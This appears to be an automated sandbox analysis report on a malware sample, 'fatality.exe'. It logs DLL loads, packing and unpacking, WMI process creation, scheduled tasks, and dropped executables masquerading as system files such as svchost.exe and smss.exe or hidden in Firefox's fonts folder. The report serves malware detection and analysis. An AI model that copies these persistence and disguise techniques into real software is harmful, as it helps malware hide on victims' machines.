                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: mscoree.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: apphelp.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: version.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: uxtheme.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: windows.storage.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: wldp.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: profapi.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptsp.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: rsaenh.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptbase.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: mscoree.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: sspicli.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Users\user\Desktop\fatality.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\c0a39dc94da3cf
                                      Source: fatality.exeStatic file information: File size 3457619 > 1048576
                                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe , fatality.exe , 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp
                                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.pdb source: containerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp

                                      Data Obfuscation

                                      barindex
                                      Detected CryptOne packer
                                      Source: C:\Windows\Resources\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                                      Detected unpacking (changes PE section rights)
                                      Source: C:\Users\user\Desktop\fatality.exe Unpacked PE file: 1.2.fatality.exe .8e0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                      Detected unpacking (creates a PE file in dynamic memory)
                                      Source: C:\blockcomSession\containerReview.exeUnpacked PE file: 13.2.containerReview.exe.3250000.5.unpack
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\Users\user\Desktop\fatality.exe File created: C:\blockcomSession\__tmp_rar_sfx_access_check_3774000Jump to behavior
                                      Source: explorer.exe.2.drStatic PE information: real checksum: 0x4bf451a should be: 0x2a8ed
                                      Source: fatality.exe .0.drStatic PE information: real checksum: 0x0 should be: 0x338c7e
                                      Source: fatality.exeStatic PE information: real checksum: 0x4bf451a should be: 0x35791e
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe1.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: spoolsv.exe.3.drStatic PE information: real checksum: 0x4bf451a should be: 0x29915
                                      Source: icsys.icn.exe.0.drStatic PE information: real checksum: 0x4bf451a should be: 0x22717
                                      Source: containerReview.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: svchost.exe.4.drStatic PE information: real checksum: 0x4bf451a should be: 0x2c3b9
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe0.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: Idle.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: SecurityHealthSystray.exe.19.drStatic PE information: real checksum: 0x0 should be: 0xe3ae
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: smss.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name: cheat
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FF640 push ecx; ret 1_2_008FF653
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FEB78 push eax; ret 1_2_008FEB96
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0090DDED push dword ptr [esp+ecx-75h]; iretd 1_2_0090DDF1
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096B28C push 0096B6D8h; ret 1_2_0096B6D0
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009743A0 push 00974400h; ret 1_2_009743F8
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009633EA push 00963418h; ret 1_2_00963410
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00963494 push 009634C0h; ret 1_2_009634B8
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009634F8 push 0096352Ch; ret 1_2_00963524
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00963424 push 00963450h; ret 1_2_00963448
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00974456 push 009745A4h; ret 1_2_0097459C
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00975454 push 009754A1h; ret 1_2_00975499
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096345C push 00963488h; ret 1_2_00963480
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009615F0 push 00961641h; ret 1_2_00961639
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00973536 push 009735B5h; ret 1_2_009735AD
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00974684 push ecx; mov dword ptr [esp], ecx1_2_00974687
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009726A4 push 0097274Ch; ret 1_2_00972744
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096B6DA push 0096B74Bh; ret 1_2_0096B743
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0097262C push 009726A2h; ret 1_2_0097269A
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0097274E push 0097279Ch; ret 1_2_00972794
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009618AA push 009618D8h; ret 1_2_009618D0
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009748F4 push ecx; mov dword ptr [esp], ecx1_2_009748F6
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00973804 push 00973830h; ret 1_2_00973828
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096B85E push 0096B88Ch; ret 1_2_0096B884
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00961968 push 00961994h; ret 1_2_0096198C
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00962A48 push ecx; mov dword ptr [esp], eax1_2_00962A49
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00962CF2 push 00962D20h; ret 1_2_00962D18
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00962D2C push 00962D58h; ret 1_2_00962D50
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096AD60 push ecx; mov dword ptr [esp], edx1_2_0096AD65
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0095DF90 push eax; ret 1_2_0095DFCC
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0493515E push ecx; retf 1_2_0493515F
                                      Source: C:\Windows\Resources\Themes\explorer.exeCode function: 3_2_0339FC55 push eax; iretd 3_2_0339FC5D
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.996600566459323
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.979119292488003
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.461008587981874
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.941503255275258
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.853249739854464
                                      Source: fatality.exe .0.drStatic PE information: section name: .rsrc entropy: 7.51495699813517
                                      Source: fatality.exe .0.drStatic PE information: section name: cheat entropy: 7.982180837051556
                                      Source: containerReview.exe.1.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe0.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: smss.exe.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe1.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: Idle.exe.13.drStatic PE information: section name: .text entropy: 7.568689515066778

                                      Persistence and Installation Behavior

                                      barindex
                                      Creates processes via WMI
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Drops PE files with benign system names
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\smss.exeJump to dropped file
                                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                                      Drops executable to a common third party application directory
                                      Source: C:\blockcomSession\containerReview.exeFile written: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Drops executables to the windows directory (C:\Windows) and starts them
                                      Source: C:\Windows\Resources\svchost.exeExecutable created and started: c:\windows\resources\spoolsv.exeJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeExecutable created and started: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                      Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\themes\explorer.exe
                                      Source: C:\Windows\Resources\spoolsv.exeExecutable created and started: c:\windows\resources\svchost.exeJump to behavior
                                      Infects executable files (exe, dll, sys, html)
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\Idle.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\fatality.exe File created: C:\blockcomSession\containerReview.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\smss.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\zRrwKlet.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\FJTVnRjh.logJump to dropped file
                                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Users\user\Desktop\fatality.exe Jump to dropped file
                                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\hEPrrPJe.logJump to dropped file
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\ZKzjsAAu.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\SdSCeHzI.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\XWvbHmEw.logJump to dropped file
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Users\user\Desktop\fatality.exe Jump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\ZKzjsAAu.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\SdSCeHzI.logJump to dropped file
